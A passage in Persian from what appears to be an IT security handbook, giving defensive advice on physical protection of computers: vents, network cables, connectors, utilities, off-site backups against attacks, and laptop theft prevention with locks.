‫ﻻ ﻫﺮ ﺑﺨﺶ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﻳﺎ ﺳﺎﺧﺘﻤﺎﻧﻲ ﻛﻪ ﺁﻧﺮﺍ ﺩﺭ ﺧﻮﺩ ﺟﺎ ﺩﺍﺩﻩ ﺍﺳﺖ‬ ‫ﻭ ﻓﻜﺮﻱ‪ ،‬ﻭ ﻳﺎ ﺗﻨﻬﺎ ﺳﺮﮔﺮﻣﻲ ﺑﺮﺍﻱ ﻧﺎﺑﺨﺮﺩﺍﻥ ﺑﺎﺷﺪ‪ .‬ﺍﺻﻮ ﹰ‬
‫‪ -‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﺗﺨﺮﻳﺐ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ .‬ﺩﺭ ﻋﻤﻞ ﺑﻌﻀﻲ ﺍﺯ ﺍﻫﺪﺍﻑ ﺑﻴﺶ ﺍﺯ ﺳﺎﻳﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪.‬‬

‫ﻣﻨﺎﻓﺬ ﺗﻬﻮﻳﺔ ﻫﻮﺍ‬


‫ﺳﺎﻟﻬﺎ ﻗﺒﻞ‪ ۶۰ ،‬ﺍﻳﺴﺘﮕﺎﻩﻛﺎﺭﻱ ﺩﺭ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳﺖ )ﺩﺍﻧﺸﮕﺎﻩ ‪ ٥٧(MIT‬ﺩﺭ ﺗﻨﻬﺎ ﻳﻚ ﺑﻌﺪﺍﺯﻇﻬﺮ ﺗﻮﺳﻂ ﻳﻚ ﺩﺍﻧﺸﺠﻮ ﻛـﻪ ﻧﻮﺷـﺎﺑﻪ‪-‬‬
‫ﺍﺵ ﺭﺍ ﺩﺍﺧﻞ ﺳﻮﺭﺍﺧﻬﺎﻱ ﺗﻬﻮﻳﻪ ﻫﻮﺍﻱ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺭﻳﺨﺖ ﺧﺮﺍﺏ ﺷﺪﻧﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺍﺭﺍﻱ ﺷﻜﺎﻓﻬﺎﻱ ﺗﻬﻮﻳﺔ ﻫﻮﺍ ﻫﺴﺘﻨﺪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺣﺘﻴﺎﺝ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻨﮕﻮﻧﻪ ﺗﺨﺮﻳﺒﻬﺎ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﻳـﻦ ﺷـﻜﺎﻓﻬﺎ ﺭﺍ‬
‫ﻣﺴﺪﻭﺩ ﻛﺮﺩ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺁﻭﺭﺩﻥ ﻏﺬﺍ ﻭ ﻧﻮﺷﻴﺪﻧﻲ ﺑﻪ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﻛﻴﺪﹰﺍ ﻣﻤﻨﻮﻉ ﻧﻤﻮﺩ‪ ،‬ﻳﺎ ﺣﻔﺎﻇـﺖ ‪ ۲۴‬ﺳـﺎﻋﺘﻪ ﺭﺍ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ ﻣـﺄﻣﻮﺭ ﻳـﺎ‬
‫ﺗﻠﻮﻳﺰﻳﻮﻥ ﻣﺪﺍﺭ ﺑﺴﺘﻪ ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪.‬‬

‫‪57‬‬ ‫‪Massachusetts Institute of Technology‬‬


‫‪٢٨٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺷﺨﺺ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻞ ﺯﻳﺮﺷﺒﻜﺔ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺭﺍ ﺑﺎ ﻗﻄﻊ ﺗﻨﻬﺎ ﻳﻚ ﺳﻴﻢ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳـﻴﻢﭼـﻴﻦ‬
‫ﺍﺯ ﻛﺎﺭ ﺑﻴﻨﺪﺍﺯﺩ‪ .‬ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ‪ Ethernet‬ﺁﺳﻴﺐﭘﺬﻳﺮﺗﺮ ﻫﺴﺘﻨﺪ )ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ(‪ ،‬ﻣﺸﻜﻠﺘﺮ ﺗﺮﻣﻴﻢ ﻣـﻲﺷـﻮﻧﺪ‬
‫)ﺳﺨﺖ ﺑﻪ ﻫﻢ ﭘﻴﻮﻧﺪ ﻣﻲﺧﻮﺭﻧﺪ(‪ ،‬ﻭ ﺍﻫﺪﺍﻑ ﺟﺬﺍﺑﺘﺮﻱ ﻫﺴﺘﻨﺪ )ﻣﻌﻤﻮ ﹰﻻ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺗﺒﺎﺩﻝ ﻣﻲﻛﻨﻨﺪ(‪.‬‬
‫ﻻ ﺍﺯ ﻛﺎﺑﻞﻛﺸﻲﻫﺎﻱ "ﻣﻮﻗﺖ" ﺩﺭ ﺗﺄﺳﻴﺴﺎﺕ‪ ،‬ﺑﺼﻮﺭﺕ ﺩﺍﺋﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؛ ﭘﺲ ﻭﻗﺖ ﻭ ﺗﻼﺵ ﺑﻴﺸﺘﺮﻱ ﺻﺮﻑ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﻫﻤﺎﻥ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺑﺘﺪﺍ ﻛﺎﺑﻞ ﺭﺍ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﻧﺼﺐ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻳﻚ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻧﺮﺍ ﺍﺯ ﻣﺤﻠﻬﺎﻱ ﻭﺍﺟـﺪ ﺍﻣﻨﻴـﺖ‬
‫ﻓﻴﺰﻳﻜﻲ ﻋﺒﻮﺭ ﺩﻫﻴﻢ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ Ethernet‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﻴﺎﻥ ﻣﺠﺎﺭﻱ ﻓﻮﻻﺩﻱ ﻋﺒﻮﺭ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺷﻴﻮﻩ ﻋﻼﻭﻩ ﺑﺮ ﺣﻔﺎﻇـﺖ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﺗﺨﺮﻳﺐ‪ ،‬ﺩﺭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺑﻌﻀﻲ ﺍﻧﻮﺍﻉ ﺍﺳﺘﺮﺍﻕﺳﻤﻊﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻧﻴﺰ ﻛﺎﺭﺳﺎﺯ ﺍﺳﺖ‪ ،‬ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺑﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺩﺭﺻـﻮﺭﺕ ﻭﻗـﻮﻉ ﻳـﻚ‬
‫ﺁﺗﺶﺳﻮﺯﻱ ﻛﻮﭼﻚ ﻫﻢ ﺣﻔﻆ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻛﺴﻲ ﺭﻭﻱ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﭘﺎ ﺑﮕﺬﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﻬﺎ ﺷﻜﺴﺘﮕﻲﻫﺎﻱ ﻛﻮﭼﻚ ﺭﺥ ﺩﻫـﺪ‪.‬‬
‫ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳﻚ ﺷﻜﺴﺘﮕﻲ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﻣﺸﻜﻞ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﺍﺛﺮﻱ ﺍﺯ ﺁﻥ ﺩﺭ ﺭﻭﻛﺶ ﻛﺎﺑﻞ ﺩﻳﺪﻩ ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺗﺄﺳﻴﺴﺎﺕ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﺍﺯ ﻛﺎﻧﺎﻟﻬﺎﻱ ﺩﻭ ﺟﺪﺍﺭﺓ ﺣﻔﺎﻅﺩﺍﺭ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﻻﻳﻪﻫﺎﻱ ﺁﻥ ﮔﺎ ﹺﺯ ﻓﺸﺮﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺍﮔـﺮ‬
‫ﻓﺸﺎﺭ ﺩﺭﻭﻥ ﺟﺪﺍﺭﻩﻫﺎ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻳﺪ ﻓﺸﺎﺭﻳﺎﺏﻫﺎﻱ ﻛﺎﻧﺎﻝ ﺗﺮﺍﻓﻴﻚ ﮔﺬﺭﻧﺪﻩ ﺍﺯ ﺧﻄﻮﻁ ﺭﺍ ﻣﺘﻮﻗﻒ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺯﻧﮓ ﺧﻄﺮ ﺭﺍ ﺑﻪ ﺻﺪﺍ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﻼ ﺷﺨﺼﻲ ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﻛﺎﻧﺎﻝ ﻣﻨﻔﺬ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪.‬‬‫ﺍﻳﻨﺤﺎﻟﺖ ﻭﻗﺘﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻣﺜ ﹰ‬

‫ﺍﺗﺼﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺑﺮﻳﺪﻥ ﻳﻚ ﻛﺎﺑﻞ‪ ،‬ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﻪ ﻳﻚ ﭘﺎﻳﺎﻧﺔ ﺷﺒﻜﻪ ‪ -‬ﻳﺎ ﻳﻚ ﺍﺗﺼﺎﻝﺩﻫﻨﺪﺓ ﺷﺒﻜﻪ ‪ -‬ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻕ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ‬
‫ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ ﻳﺎ ﺷﺒﻜﻪ ﺭﺍ ﺩﭼﺎﺭ ﺁﺳﻴﺐ ﻛﻨﺪ‪ .‬ﻫﻤﺔ ﺷﺒﻜﻪﻫﺎﻱ ﻛﺎﺑﻠﻲ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻭﻟﺘﺎﮊ ﻗﻮﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪.‬‬

‫ﺍﺗﺼﺎﻻﺕ ﻭﺳﺎﻳﻞ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﻗﻄﻊ ﻛﺮﺩﻥ ﺑﺮﻕ‪ ،‬ﮔﺎﺯ ﻭ ﺁﺏ ‪ -‬ﮔﺎﻫﻲ ﺣﺘﻲ ﺍﺯ ﺧﺎﺭﺝ ﺳﺎﺧﺘﻤﺎﻥ ‪ -‬ﺑﺮﺍﺣﺘﻲ ﻣﻴﺴﺮ ﺍﺳﺖ‪ .‬ﭼـﻮﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺎﺯ ﺑـﻪ‬
‫ﺍﻧﺮﮊﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﭼﻮﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﮔﺮﻣﻜﻦﻫﺎﻱ ﮔﺎﺯﻱ ﻳﺎ ﺳﺮﺩﻛﻦﻫﺎﻱ ﺁﺑﻲ ﻭﺍﺑﺴﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻳـﻦ ﺍﻣـﺮ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺗﺨﺮﻳﺒﮕﺮ ﻧﻘﺎﻁ ﺍﻧﺠﺎﻡ ﺣﻤﻠﺔ ﺟﺪﻳﺪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‪.‬‬

‫ﺩﻓﺎﻉ ﺩﺭ ﻣﻘﺎﺑﻞ ﻋﻤﻠﻴﺎﺕ ﺟﻨﮕﻲ ﻭ ﺗﺮﻭﺭﻳﺴﺘﻲ‬


‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﭼﻮﻥ ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺕ ﻏﻴﺮﻣﻤﻜﻦ ﺍﺳﺖ‪ ،‬ﺳﻴﺴﺘﻤﻲ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻓﻮﺭﻱ ﻭ ﺩﻳﺴﻜﻬﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﻧﻌﮑﺎﺳـﻲ‬
‫ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺑﺎ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺒﻜﺔ ﻧﺴﺒﺘﹰﺎ ﺳﺮﻳﻊ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺮﺗﻴﺒﻲ ﺩﻫﻴﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﻛـﺎﻣﭙﻴﻮﺗﺮ ﻫﻤﺰﻣـﺎﻥ‬
‫ﺭﻭﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﻭﺍﻗﻊ ﺩﺭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺷﻬﺮ ﻳﺎ ﺁﻧﺴﻮﻱ ﺟﻬﺎﻥ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺷﻮﻧﺪ‪ .‬ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻫﻤﺰﻣـﺎﻥ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ‪dump‬ﻫﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺳﺎﻋﺘﻲ ﻳﺎ ﺷﺒﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻳﻚ ﺑﻤﺒﮕﺬﺍﺭﻱ ﺍﻧﺘﺤﺎﺭﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻛﺰ ﺭﺍﻳﺎﻧﻪﺍﻱ‬
‫ﺷﻤﺎ ﺭﺍ ﻧﺎﺑﻮﺩ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺟﺎﻱ ﺩﻳﮕﺮ ﻭ ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﺣﻔﺎﻇﺖ ﻧﻤﻮﺩ‪.‬‬

‫ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ‪ -‬ﺧﺼﻮﺻﹰﺎ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ‪ -‬ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺗﺠﺮﺑﺔ ﺁﺯﺍﺭﺩﻫﻨﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺍﻣـﺎ ﺍﮔـﺮ ﺭﺍﻳﺎﻧـﻪ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ ﻏﻴﺮﻗﺎﺑـﻞ‬
‫ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﺎ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﺣﺴﺎﺱ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻗﺮﺑﺎﻧﻲ ﮔﺮﺍﻥ ﺗﻤﺎﻡ ﺷﻮﺩ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﺑﻪ ﺳﺮﻗﺖ ﻣﻲﺭﻭﻧﺪ ‪ -‬ﻳﺎ ﺑﺼﻮﺭﺕ ﺳﻴـﺴﺘﻢ ﻛﺎﻣـﻞ ﻭ ﻳـﺎ ﺍﮔـﺮ ﺳـﺎﺭﻗﺎﻥ ﺧﺒـﺮﻩ ﺑﺎﺷـﻨﺪ‬
‫ﺑﺼﻮﺭﺕ ﻗﻄﻌﺎﺕ ﻣﺠﺰﺍ‪ ،‬ﻛﻪ ﺭﺩﻳﺎﺑﻲ ﻛﺮﺩﻧﺸﺎﻥ ﻣﺸﻜﻠﺘﺮ ﺍﺳﺖ‪ .‬ﺑﻌﻀﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻮﺳﻂ ﻛﺴﺎﻧﻲ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ‬
‫ﻻ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﺁﻥ‬ ‫ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺗﻬﻴﻪ ﻛﻨﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻫﻢ ﺑﻪ ﺧﺎﻃﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٨٦‬‬

‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻭ ﺍﻟﺒﺘﻪ ﮔﺎﻫﻲ ﻫﻢ ﺗﻮﺳﻂ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺻﺎﺣﺐ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ ﻛـﺎﺭﺑﺮﺩ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺤـﺮﻭﻡ ﻛﻨﻨـﺪ ﺑـﻪ‬
‫ﺳﺮﻗﺖ ﻣﻲﺭﻭﻧﺪ‪ .‬ﻣﻬﻢ ﻧﻴﺴﺖ ﻛﻪ ﭼﺮﺍ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﺩ؛ ﻏﺎﻟﺐ ﺳﺮﻗﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﻚ ﻋﻨﺼﺮ ﻣﺸﺘﺮﻙ ﺩﺍﺭﻧﺪ‪ :‬ﻓﺮﺻﺖ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ‬
‫ﺍﺯ ﻣﻮﺍﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺪﻭﻥ ﻣﺤﺎﻓﻈﺖ ﺭﻫﺎ ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺳﺮﻗﺖ ﻣـﻲﺭﻭﻧـﺪ‪ ،‬ﻣﺤﻜـﻢ‬
‫ﺑﺴﺘﻦ ﺁﻧﻬﺎ ﺑﻪ ﺟﺎﻳﻲ ﻣﺸﻜﻞ ﺍﺳﺖ )ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺩﻳﮕﺮ ﺳﻴﺎﺭ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ!(‪ ،‬ﻭ ﺑﻪ ﺳﺎﺩﮔﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﻣﻲﺭﺳﻨﺪ‪ .‬ﻛﺴﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ‬
‫ﻛﻴﻔﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻨﺪ‪ .‬ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﻛﻪ ﺳﺮﻗﺖ ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫـﺎ‬
‫ﺑﺨﺼﻮﺹ ﺩﺭ ﻓﺮﻭﺩﮔﺎﻫﻬﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻳﻚ ﻣﻌﻀﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ‪ .‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﺒﺎﻳﺪ ﺩﺭ ﻫﻴﭻ ﻛﺠﺎ ﻭ ﺑﺮﺍﻱ ﻫﻴﭻ ﻣﺪﺗﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ‬
‫ﺭﻫﺎ ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺑﺎ ﺗﺎﻛﺴﻲ ﻣﺴﺎﻓﺮﺕ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺻﻨﺪﻭﻕﻋﻘﺐ ﻣﺎﺷﻴﻦ‪ ،‬ﻧﺰﺩ ﺧﻮﺩﺗﺎﻥ ﻧﮕﻬﺪﺍﺭﻳﺪ‪.‬‬
‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﺳﺎﺩﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺧﻄﺮ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔـﻲ ﻳـﺎ ﺭﻭﻣﻴـﺰﻱ ﺭﺍ ﺑـﻪ ﻣﻴـﺰﺍﻥ ﺯﻳـﺎﺩﻱ‬
‫ﻛﺎﻫﺶ ﺩﻫﻴﺪ‪.‬‬

‫ﻗﻔﻠﻬﺎ‬
‫ﻳﻜﻲ ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﺧﻮﺏ ﺣﻔﺎﻇﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﻗﺖ‪ ،‬ﺍﻳﻤﻦﺳﺎﺯﻱ ﻓﻴﺰﻳﻜﻲ ﺁﻥ ﺍﺳﺖ‪ .‬ﺍﺗﺼﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺑﺴﺘﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﺑﻪ ﻣﻴﺰﻫﺎ ﻭ ﻛﺎﺑﻴﻨﺖﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺳﺮﻗﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻣﻲﺳﺎﺯﻧﺪ‪.‬‬
‫ﻗﺎﺑﻠﻴﺖ ﺣﻤﻞ ﺁﺳﺎﻥ ﻳﻚ ﻋﺎﻣﻞ ﻣﻬﻢ ﻓﺮﻭﺵ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺻﻠﻲﺗﺮﻳﻦ ﺩﻟﻴﻞ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺁﻧﻬﺎ ﺍﺳـﺖ‪ .‬ﻳﻜـﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ‬
‫ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﺣﺘﻤﺎﻝ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺣﺪﺍﻗﻞ ﺑﻄﻮﺭ ﻣﻮﻗﺖ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰ‪ ،‬ﻳﻚ ﻟﻮﻟﻪ ﻳـﺎ ﻳـﻚ ﺷـﻲﺀ ﺑـﺰﺭﮒ‬
‫ﺩﻳﮕﺮ ﻗﻔﻞ ﻛﻨﻴﺪ‪.‬‬
